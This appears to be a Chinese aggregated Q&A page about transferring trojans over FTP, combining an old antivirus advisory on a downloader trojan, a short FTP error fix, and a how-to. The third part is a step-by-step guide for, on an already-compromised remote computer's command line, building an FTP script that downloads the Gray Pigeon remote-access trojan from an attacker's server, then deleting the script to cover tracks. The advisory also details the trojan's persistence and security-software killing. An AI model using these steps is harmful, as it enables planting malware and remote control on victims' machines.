ftp传木马

❶ 什么是ftp木马

木马下载者 Trojan-Downloader.Win32.QQHelper.ftp

病毒名称

Trojan-Downloader.Win32.QQHelper.ftp

捕获时间

2007年9月9日

病毒症状

该木马程序是一个用Delphi语言编写的木马，长度127,488 字节，无装饰性图标，发作后将自身和释放的库文件Vermin.dll插入explorer.exe及其子进程，在后台下载其他木马程序。

病毒分析

该木马是一个比较顽固的木马程序，触发后会拷贝自身文件到系统目录的inf文件夹下执行，并将其注册为服务名为＂Windows Media Service＂的系统服务以获得系统权限，服务描述＂管理多媒体设备，如果服务被终止，音频设备及其音效将不能正常工作。如果此服务被禁用，任何依它的服务将无法启动＂；释放Vermin.dll监控系统消息；通过调试手段将自身映像和Vermin.dll模块注入到explorer.exe及其所有子进程中，在后台调用相关下载函数下载其他木马程序；通过查找窗口以及窗口类的方式获取某些安全软件的进程，尝试强行终止安全软件进程或通过发送消息强行关闭其窗口；使用IFEO映像劫持系统文件ctfmon.exe（即Windows任务栏的语言栏工具条）到病毒映像路径，使得木马会在开机时自动启动。

感染对象

Windows2000/Windows XP/Windows2003

传播途径

文件捆绑/网页木马传播

安全提示

已安装微点主动防御软件的用户，无论您是否已经升级到最新版本，微点主动防御都能够有效防御该木马程序。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您“发现未知木马”，请直接选择删除处理（如图1）；

如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现Trojan-Downloader.Win32.QQHelper.ftp”，请直接选择删除（如图2）。

使用其它杀毒软件的用户，请尽快将您的杀毒软件特征库升级到最新版本进行查杀，并开启防火墙拦截网络异常访问，如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。由于该病毒的特殊性，会自动终止某些杀毒软件运行，如果您的杀毒软件已经无法正常运行，您也可以尝试安装微点解决。

没有安装微点主动防御软件的用户，建议您尽快安装使用微点主动防御软件查杀预防各类新病毒。

❷ ftp传输不了文件 显示严重文件传输错误

原因：设置错误造成。解决方法：重新设置服务器来解决此问题。

如下参考：

1.首先打开个人FTP软件，弹出如下界面。个人可选择直接在窗口中输入相关信息或通过网站管理器保存个人用户信息。使用站点管理器保存个人信息，如下图。

❸ 远程计算机怎么用FTP传文件啊

在远程计算机的cmd环境下，如果不能通过ipc$渠道传送文件，那就只有通过ftp下载文件了。
假设我们已经有一个ftp服务器，上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道ftp服务器的三个参数：
1、ftp服务器的ip地址：如203.75.44.34
2、ftp服务器的用户名：如tty
3、ftp服务器的密
码：如tty123
在远程计算机的cmd下依次输入下面的命令：
1、echo
open
203.75.44.34>>tty.txt
登陆ftp服务器
2、echo
tty>>tty.txt
用户名
3、echo
tty123>>tty.txt
密码
4、echo
bin>>tty.txt
开始
5、echo
get
mhgz.exe>>tty.txt
下载灰鸽子木马
6、echo
bye>>tty.txt
关闭ftp服务器
输入上面命令后，在远程计算机上就会生成一个tty.txt文件，内容为：
open
203.75.44.34
tty
tty123
bin
get
mhgz.exe
bye
现在我们在远程计算机上执行下面的命令：
ftp
-s:tty.txt
意思是，读取tty.txt里的参数，执行ftp命令，命令执行完后，灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
del
c:\tty.txt